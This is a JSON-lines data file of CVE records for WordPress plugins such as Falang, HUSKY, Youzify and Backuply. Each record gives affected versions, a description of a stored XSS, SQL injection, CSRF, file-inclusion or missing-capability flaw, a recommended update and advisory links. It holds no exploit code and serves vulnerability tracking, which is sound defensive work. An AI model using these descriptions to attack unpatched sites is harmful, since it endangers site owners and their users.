{"CVE_ID":"CVE-2022-4650","slug":"hashbar-wp-notification-bar","versionEndExcluding":"1.3.6","description":"The HashBar WordPress plugin before 1.3.6 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b430fdaa-191a-429e-b6d2-479b32bb1075\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b430fdaa-191a-429e-b6d2-479b32bb1075\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6869","slug":"falang","versionImpact":"1.3.52","versionEndExcluding":"1.3.53","description":"The Falang multilanguage for WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 1.3.52. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update and delete translations and expose the administrator email address.","recommendation":"Update to version 1.3.53, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd4d67cd-5fb0-425d-8b22-c69ebb0ffa72?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd4d67cd-5fb0-425d-8b22-c69ebb0ffa72?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/falang\\\/trunk\\\/admin\\\/class-falang-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/falang\\\/trunk\\\/admin\\\/class-falang-admin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131499\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3131499\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4417","slug":"falang","versionImpact":"1.3.49","versionEndExcluding":"1.3.50","description":"The Falang multilanguage for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.3.49 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.3.50, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b62949fd-d73f-4c42-82c7-c29986bca1da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b62949fd-d73f-4c42-82c7-c29986bca1da?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3082466%40falang%2Ftrunk&old=3059173%40falang%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3082466%40falang%2Ftrunk&old=3059173%40falang%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1795","slug":"woocommerce-products-filter","versionImpact":"1.3.5.2","versionEndExcluding":"1.3.5.3","description":"The HUSKY \u2013 Products Filter for WooCommerce Professional plugin for WordPress is vulnerable to SQL Injection via the 'name' parameter in the woof shortcode in all versions up to, and including, 1.3.5.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.3.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fff8dfbc-fd59-47db-85bb-de2a7c6a9a5f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fff8dfbc-fd59-47db-85bb-de2a7c6a9a5f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3051027%40woocommerce-products-filter&new=3051027%40woocommerce-products-filter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3051027%40woocommerce-products-filter&new=3051027%40woocommerce-products-filter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1796","slug":"woocommerce-products-filter","versionImpact":"1.3.5.1","versionEndExcluding":"1.3.5.2","description":"The HUSKY \u2013 Products Filter for WooCommerce Professional plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'woof' shortcode in all versions up to, and including, 1.3.5.1 due to insufficient input sanitization and output escaping on user supplied attributes such as 'swoof_slug'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/748bc714-25ba-404e-ac3d-e588fd95b2f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/748bc714-25ba-404e-ac3d-e588fd95b2f9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3045600%40woocommerce-products-filter&new=3045600%40woocommerce-products-filter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3045600%40woocommerce-products-filter&new=3045600%40woocommerce-products-filter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13368","slug":"youzify","versionImpact":"1.3.4","versionEndExcluding":"1.3.5","description":"The Youzify \u2013 BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the youzify_offer_banner() function in all versions up to, and including, 1.3.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary site options to a value of one.","recommendation":"Update to version 1.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youzify\\\/tags\\\/1.3.2\\\/includes\\\/admin\\\/core\\\/functions\\\/youzify-general-functions.php#L961\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youzify\\\/tags\\\/1.3.2\\\/includes\\\/admin\\\/core\\\/functions\\\/youzify-general-functions.php#L961\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad2abd5b-3067-4dcd-a650-b543fa03437b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad2abd5b-3067-4dcd-a650-b543fa03437b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11332","slug":"hipaatizer","versionImpact":"1.3.4","versionEndExcluding":"1.3.5","description":"The HIPAA Compliant Forms with Drag\u2019n\u2019Drop HIPAA Form Builder. Sign HIPAA documents plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'hipaatizer' shortcode in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3192694%40hipaatizer&new=3192694%40hipaatizer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3192694%40hipaatizer&new=3192694%40hipaatizer&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/988a7d0a-72d2-4962-bcb4-b08859de925c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/988a7d0a-72d2-4962-bcb4-b08859de925c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-36529","slug":"houzez-crm","versionEndExcluding":"1.3.5","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Favethemes Houzez - Real Estate WordPress Theme allows SQL Injection. This issue affects Houzez - Real Estate WordPress Theme: from n\/a through 1.3.4.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/houzez-crm\\\/wordpress-houzez-crm-plugin-1-3-3-sql-injection?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/houzez-crm\\\/wordpress-houzez-crm-plugin-1-3-3-sql-injection?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2329","slug":"wc-gsheetconnector","versionEndExcluding":"1.3.5","description":"The WooCommerce Google Sheet Connector WordPress plugin through 1.3.4 does not have CSRF check when updating its Access Code, which could allow attackers to make logged in admin change the access code to an arbitrary one via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e58f099-e8d6-49e4-9f02-d6a556c5b1d2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e58f099-e8d6-49e4-9f02-d6a556c5b1d2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0500","slug":"wp-film-studio","versionEndExcluding":"1.3.5","description":"The WP Film Studio WordPress plugin before 1.3.5 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/95a6a11e-da5d-4fac-aff6-a3f7624682b7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/95a6a11e-da5d-4fac-aff6-a3f7624682b7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8669","slug":"backuply","versionImpact":"1.3.4","versionEndExcluding":"1.3.5","description":"The Backuply \u2013 Backup, Restore, Migrate and Clone plugin for WordPress is vulnerable to SQL Injection via the 'options' parameter passed to the backuply_wp_clone_sql() function in all versions up to, and including, 1.3.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a061553-c988-4a31-a0a2-7a2608faa33f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a061553-c988-4a31-a0a2-7a2608faa33f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backuply\\\/trunk\\\/functions.php#L1477\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/backuply\\\/trunk\\\/functions.php#L1477\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3151205\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3151205\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4562","slug":"meks-flexible-shortcodes","versionEndExcluding":"1.3.5","description":"The Meks Flexible Shortcodes WordPress plugin before 1.3.5 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2013d79b-e9f6-4a5a-b421-e840a3bae063\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2013d79b-e9f6-4a5a-b421-e840a3bae063\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11643","slug":"allaccessible","versionImpact":"1.3.4","versionEndExcluding":"1.3.5","description":"The Accessibility by AllAccessible plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the 'AllAccessible_save_settings' function in all versions up to, and including, 1.3.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 1.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/allaccessible\\\/trunk\\\/allaccessible.php#L249\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/allaccessible\\\/trunk\\\/allaccessible.php#L249\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202017\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202017\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb65d916-7d9e-4562-ab9b-c7ba012a08fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb65d916-7d9e-4562-ab9b-c7ba012a08fb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2326","slug":"gsheetconnector-gravity-forms","versionEndExcluding":"1.3.5","description":"The Gravity Forms Google Sheet Connector WordPress plugin before 1.3.5, gsheetconnector-gravityforms-pro WordPress plugin through 1.3.5 does not have CSRF check when updating its Access Code, which could allow attackers to make logged in admin change the access code to an arbitrary one via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f922695a-b803-4edf-aadc-80c79d99bebb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f922695a-b803-4edf-aadc-80c79d99bebb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1783","slug":"gallery-styles","versionImpact":"1.3.4","versionEndExcluding":"1.3.5","description":"The Gallery Styles plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Gallery Block in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gallery-styles\\\/tags\\\/1.3.4\\\/gallery-styles.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gallery-styles\\\/tags\\\/1.3.4\\\/gallery-styles.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251908\\\/gallery-styles\\\/trunk\\\/gallery-styles.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251908\\\/gallery-styles\\\/trunk\\\/gallery-styles.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9443e36-648c-4984-8b06-28e9da959e26?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9443e36-648c-4984-8b06-28e9da959e26?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13389","slug":"cliptakes","versionImpact":"1.3.4","versionEndExcluding":"1.3.5","description":"The Cliptakes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cliptakes_input_email' shortcode in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226472\\\/cliptakes\\\/tags\\\/1.3.5\\\/public\\\/class-cliptakes-public.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226472\\\/cliptakes\\\/tags\\\/1.3.5\\\/public\\\/class-cliptakes-public.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a939be31-7475-4626-ba1b-af9a9d6d5eda?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a939be31-7475-4626-ba1b-af9a9d6d5eda?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5955","slug":"contact-form-to-email","versionImpact":"1.3.43","versionEndExcluding":"1.3.44","description":"The Contact Form Email WordPress plugin before 1.3.44 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.3.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b5fce7e-14fc-4548-8747-96fdd58fdd98\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b5fce7e-14fc-4548-8747-96fdd58fdd98\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4707","slug":"materialis-companion","versionImpact":"1.3.41","versionEndExcluding":"1.3.42","description":"The Materialis Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's materialis_contact_form shortcode in all versions up to, and including, 1.3.41 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.42, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ca4dff0-ca3a-44cf-a30b-36b31d2848ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ca4dff0-ca3a-44cf-a30b-36b31d2848ab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/materialis-companion\\\/trunk\\\/theme-data\\\/materialis\\\/functions.php#L90\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/materialis-companion\\\/trunk\\\/theme-data\\\/materialis\\\/functions.php#L90\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3097691%40materialis-companion&new=3097691%40materialis-companion&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3097691%40materialis-companion&new=3097691%40materialis-companion&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4762","slug":"materialis-companion","versionEndExcluding":"1.3.40","description":"The Materialis Companion WordPress plugin before 1.3.40 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4500566a-e5f2-40b8-a185-2bcace221b4e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4500566a-e5f2-40b8-a185-2bcace221b4e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-37968","slug":"falang","versionEndExcluding":"1.3.40","description":"Cross-Site Request Forgery (CSRF) vulnerability in Faboba Falang multilanguage for WordPress plugin <=\u00a01.3.39 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/falang\\\/wordpress-falang-multilanguage-plugin-1-3-39-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/falang\\\/wordpress-falang-multilanguage-plugin-1-3-39-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13370","slug":"youzify","versionImpact":"1.3.3","versionEndExcluding":"1.3.4","description":"The Youzify \u2013 BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the save_addon_key_license() function in all versions up to, and including, 1.3.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options to a value of a valid license key.","recommendation":"Update to version 1.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youzify\\\/tags\\\/1.3.2\\\/includes\\\/admin\\\/class-youzify-admin.php?desc=1#L1348\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youzify\\\/tags\\\/1.3.2\\\/includes\\\/admin\\\/class-youzify-admin.php?desc=1#L1348\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f234d676-86ac-47ab-b8b3-b0459cbb4538?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f234d676-86ac-47ab-b8b3-b0459cbb4538?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1125","slug":"ruby-help-desk","versionEndExcluding":"1.3.4","description":"The Ruby Help Desk WordPress plugin before 1.3.4 does not ensure that the ticket being modified belongs to the user making the request, allowing an attacker to close and\/or add files and replies to tickets other than their own.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e8a4b6ab-47f8-495d-a22c-dcf914dfb58c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e8a4b6ab-47f8-495d-a22c-dcf914dfb58c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2030","slug":"contact-form-entries","versionImpact":"1.3.3","versionEndExcluding":"1.3.4","description":"The Database for Contact Form 7, WPforms, Elementor forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4528b63-8d8e-44a4-a71f-2ad1636ac93c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4528b63-8d8e-44a4-a71f-2ad1636ac93c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-entries\\\/trunk\\\/templates\\\/leads-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-entries\\\/trunk\\\/templates\\\/leads-table.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-entries\\\/trunk\\\/contact-form-entries.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-entries\\\/trunk\\\/contact-form-entries.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046066\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046066\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5250","slug":"grid-plus","versionImpact":"1.3.3","versionEndExcluding":"1.3.4","description":"The Grid Plus plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.3.2 via a shortcode attribute. This allows subscriber-level, and above, attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where PHP files with arbitrary content can be uploaded and included. This is limited to .php files.","recommendation":"Update to version 1.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-plus\\\/tags\\\/1.3.2\\\/core\\\/grid.plus.base.class.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/grid-plus\\\/tags\\\/1.3.2\\\/core\\\/grid.plus.base.class.php#L19\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a6407792-2c76-4149-a9f9-d53002135bec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a6407792-2c76-4149-a9f9-d53002135bec?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11786","slug":"login-with-vipps","versionImpact":"1.3.3","versionEndExcluding":"1.3.4","description":"The Login with Vipps and MobilePay plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'continue-with-vipps' shortcode in all versions up to, and including, 1.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-vipps\\\/tags\\\/1.3.3\\\/VippsLogin.class.php#L724\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-vipps\\\/tags\\\/1.3.3\\\/VippsLogin.class.php#L724\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197620\\\/login-with-vipps\\\/trunk\\\/VippsLogin.class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197620\\\/login-with-vipps\\\/trunk\\\/VippsLogin.class.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d015e6ce-641c-4d68-b42b-03c039e973bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d015e6ce-641c-4d68-b42b-03c039e973bd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0360","slug":"location-weather","versionEndExcluding":"1.3.4","description":"The Location Weather WordPress plugin before 1.3.4 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ba653457-415f-4ab3-a792-42640b59302b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ba653457-415f-4ab3-a792-42640b59302b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2718","slug":"contact-form-to-email","versionEndExcluding":"1.3.38","description":"The Contact Form Email WordPress plugin before 1.3.38 does not escape submitted values before displaying them in the HTML, leading to a Stored XSS vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8ad824a6-2d49-4f02-8252-393c59aa9705\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8ad824a6-2d49-4f02-8252-393c59aa9705\",\"refsource\":\"MISC\",\"tags\":[]}]"}
